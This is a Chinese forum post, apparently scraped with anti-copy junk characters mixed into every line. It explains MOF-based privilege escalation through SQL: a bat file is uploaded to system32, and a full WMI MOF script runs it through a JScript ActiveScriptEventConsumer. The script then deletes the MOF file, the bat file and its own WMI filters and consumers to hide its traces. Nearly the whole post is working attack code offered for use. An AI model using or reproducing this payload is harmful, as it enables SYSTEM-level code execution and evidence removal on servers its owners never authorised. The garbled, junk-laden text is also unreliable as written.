这个sql提权MOF需要运行 system下的文件,不能定义路径。% |1 z0 v* V: w" B C) {
需要将要运行的命令写入到bat上传到system32目录,然后执行。' j9 g' I3 ] e9 n Z- t! o
' z; ^. `$ P8 w% M" b这个sql提权MOF需要运行 system下的文件,不能定义路径。2 O6 G" u$ K7 _" l5 ]+ [0 e/ ]
需要将要运行的命令写入到bat上传到system32目录,然后执行。
8 \ o1 _& Z- }6 z8 C- x+ R( T. w# I
#pragma
, b7 X* A9 V# L/ C7 i namespace("\\\\.\\root\\cimv2")
f: z0 s8 {6 F4 _% C class
* _ V) q4 c: Z8 m" `0 g0 o% f7 P MyClass547) H9 J) {8 s2 N
{ [key]
2 F; I5 G5 A' w& ?9 a1 z/ ? string
: r7 k n$ M! ^: h8 A Name;1 h: M. C; s* S' q/ n; j9 t
};
U" u8 u- l$ L* \( M class
& J4 u# v& F z- D) _8 U ActiveScriptEventConsumer3 X/ B1 @1 ~7 E2 g4 X
: __EventConsumer { [key]% t" R- u& H H; k
string0 A, [& ]* e2 a) V8 a i2 c
Name; [not_null]
, `7 a. Z( c# f, U1 R# D9 [3 v string E* W/ ]* F# ]
ScriptingEngine; string
# Q, D- E4 n: b) Q. z! r ScriptFileName; [template]0 ~" _+ f' k9 c
string" [; P8 `4 H% o, N! I! ^) q& _
ScriptText; uint32 KillTimeout;
2 G; ]& j8 ~: _9 J) S2 i# ^ }; instance of __Win32Provider as $P {
- W! ~* E5 z+ S9 m; A# k# H Name
. Q3 z; I# Y' f a =* J4 X/ [, ~3 b, L
"ActiveScriptEventConsumer"; CLSID =
W/ B, R3 n+ v# Z6 N' \. _' }( {4 a "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";$ \! A1 I9 ~7 h4 g5 q3 w6 Q
PerUserInitialization) S: v( j, r/ m1 c
= TRUE;. N: C2 h2 m7 o
}; instance of __EventConsumerProviderRegistration { Provider: l. a U' P2 d( ~" F6 D
= $P; ConsumerClassNames2 d( {. ~! C" H6 S
=& z/ K: @+ C- z
{"ActiveScriptEventConsumer"};
% X: }* D3 X$ |( }7 B7 U, V };
6 a/ r5 h. B5 n! K% C Instance of ActiveScriptEventConsumer. e8 i E# Q: J8 `! ]* t
as $cons { Name" i0 x" K2 x8 |3 u, T
=) y! `6 ~* u: E( q3 K
"ASEC"; ScriptingEngine- n, V/ h8 T7 |' v6 F3 Q; I! F
=
3 P( e, R5 A. C1 N; q; ?7 ]. X "JScript"; ScriptText& l# Q0 X+ b/ c" }
=
+ r- s' m# E1 E "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };
C6 ?4 |7 f- j5 R Instance of ActiveScriptEventConsumer
% Y$ C! O+ w2 x. `, u as $cons2 { Name
6 k: X4 ~& s8 m& o% E1 a* F Y =
; l( W9 ?6 D# H. J8 H "qndASEC"; ScriptingEngine
$ i- S, p3 e' k4 S% P" h. M' [ =
- h6 [. n! Q/ X6 _2 r "JScript"; ScriptText
7 h, [+ {3 k( t* }2 W =
+ {; z5 }& p: _4 o- H: o "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";$ C$ C2 @0 S/ K
}; instance of __EventFilter as $Filt { Name
% `* t/ e6 \; s6 \% z/ t =
) q0 ?0 @- a' @ m7 s "instfilt"; Query
' ]7 e8 a9 g5 \ =5 |+ q2 U$ {* W/ `4 ?5 M9 ~
"SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage& {! ~( o" O7 r0 \/ [; x
=! J4 y5 E( f5 y( g
"WQL"; }; instance of __EventFilter as $Filt2 { Name* |9 C" i: G! c0 P
=8 A" h3 k( P9 _5 n
"qndfilt"; Query
) c2 V9 h; q4 b# E$ _ w- [: e) Z =" {# K: p, u( ?- _4 u& h2 ]3 f
"SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage3 l) a4 f, e* b n1 |8 ?/ G5 A
=% G! B/ Z% Z. ]* u
"WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer
. i1 w- {/ `/ V5 H = $cons; Filter
7 \) E, z2 S& [) j) T = $Filt;
) W& j5 S: d% Q1 ?7 G0 G: X; N) A }; instance of __FilterToConsumerBinding as $bind2 { Consumer$ S$ ~$ ~( J) G& y
= $cons2; Filter9 I9 r6 [" \8 w1 ^/ x. Q
= $Filt2;
4 F& b8 N$ R4 ~* E }; instance of MyClass5476 ~. g% ]& o8 p+ Q5 Z
as $MyClass { Name& m% S' {( N" E$ R. R9 I+ f% ~7 ^
=
4 ^4 W6 ^3 c/ ], Z "ClassConsumer";
: q5 X* O0 c: L `2 \# v% A" Y; G }; |